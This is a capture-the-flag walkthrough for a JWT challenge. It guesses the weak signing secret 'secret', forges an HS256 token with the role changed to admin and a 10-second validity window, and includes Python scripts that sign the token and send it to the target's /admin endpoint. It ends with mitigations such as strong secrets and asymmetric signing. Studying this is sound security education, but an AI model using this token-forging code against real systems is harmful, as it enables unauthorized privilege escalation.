This challenge requires manipulating JWT claims while respecting strict time constraints. You must create a valid JWT with admin privileges where the token validity window (exp - iat) does not exceed 10 seconds, and the token must be valid at the current time.

1. Open the challenge: Navigate to <target-ip>
2. Get a user token: Click "Get JWT Token" to obtain a basic user-level JWT
3. Analyze the token: Click "Analyze Token" to see the current token structure

For this daily challenge, the JWT secret is intentionally weak for educational purposes. Try common weak secrets:

1. Common passwords: Try "secret", "password", "key", "123456"
2. Quick test: The secret is "secret" (very common in CTF challenges)
3. Verification: You can verify this works by successfully signing a JWT

You'll need Python with the PyJWT library to manipulate JWT tokens:

# Install PyJWT library
pip install PyJWT

# Verify installation
python -c "import jwt; print('JWT library ready')"

Create a Python script to generate a valid admin JWT with proper time constraints:

#!/usr/bin/env python3
import jwt
import time

# JWT secret (discovered from weak password testing)
secret = "secret"

# Get current timestamp for precise timing
current_time = int(time.time())

# Create admin payload with 10-second validity window
payload = {
    "sub": "user123",           # Keep original subject
    "role": "admin",           # CHANGE: user → admin
    "iat": current_time,        # CHANGE: issued now
    "exp": current_time + 10    # CHANGE: expires in 10 seconds
}

# Generate properly signed JWT
admin_jwt = jwt.encode(payload, secret, algorithm="HS256")

print(f"Generated Admin JWT:")
print(admin_jwt)
print(f"\nToken valid from {current_time} to {current_time + 10}")
print(f"Current time: {int(time.time())}")
print(f"\nQuickly paste this token into the challenge!")

1. Run the script: Execute your Python script to generate the admin JWT
2. Copy immediately: Copy the generated JWT token
3. Paste quickly: Go back to the challenge page and paste the token in the test field
4. Test admin access: Click "Test Admin Access" button within 10 seconds

If the attack is successful, you'll see:

This message indicates you've successfully manipulated the JWT claims and bypassed the authentication system!

For even faster execution, create an automated script that generates and tests the token:

#!/usr/bin/env python3
import jwt
import time
import requests

secret = "secret"
target_url = "http://<target-ip>"

current_time = int(time.time())
payload = {
    "sub": "user123",
    "role": "admin",
    "iat": current_time,
    "exp": current_time + 10
}

admin_jwt = jwt.encode(payload, secret, algorithm="HS256")

# Immediately test the token
response = requests.get(f"{target_url}/admin", 
                       headers={"Authorization": f"Bearer {admin_jwt}"})

if response.status_code == 200:
    print("SUCCESS! Admin access granted!")
    print(response.json())
else:
    print(f"Failed: {response.json()}")

• Weak Secret: The JWT was signed with a simple, guessable secret
• Claims Manipulation: We changed the role claim from "user" to "admin"
• Time Constraint Bypass: We crafted a token with exactly 10 seconds validity
• Valid Signature: Our knowledge of the secret allowed us to create a properly signed token
• Privilege Escalation: We gained admin access without proper authorization

• Strong Secrets: Use cryptographically secure, random secrets (minimum 256 bits)
• Secret Management: Store secrets securely and rotate them regularly
• Server-Side Validation: Always validate all claims server-side, never trust client data
• Asymmetric Signing: Consider using RS256 with public/private key pairs
• Short Expiration: Use short token lifetimes and refresh mechanisms
• Monitoring: Log and monitor for unusual JWT patterns and failed validations

This challenge demonstrates how weak JWT secrets combined with claims manipulation can lead to privilege escalation. The time constraint adds realism, simulating scenarios where tokens have short validity periods. Understanding these vulnerabilities helps developers implement more secure JWT-based authentication systems.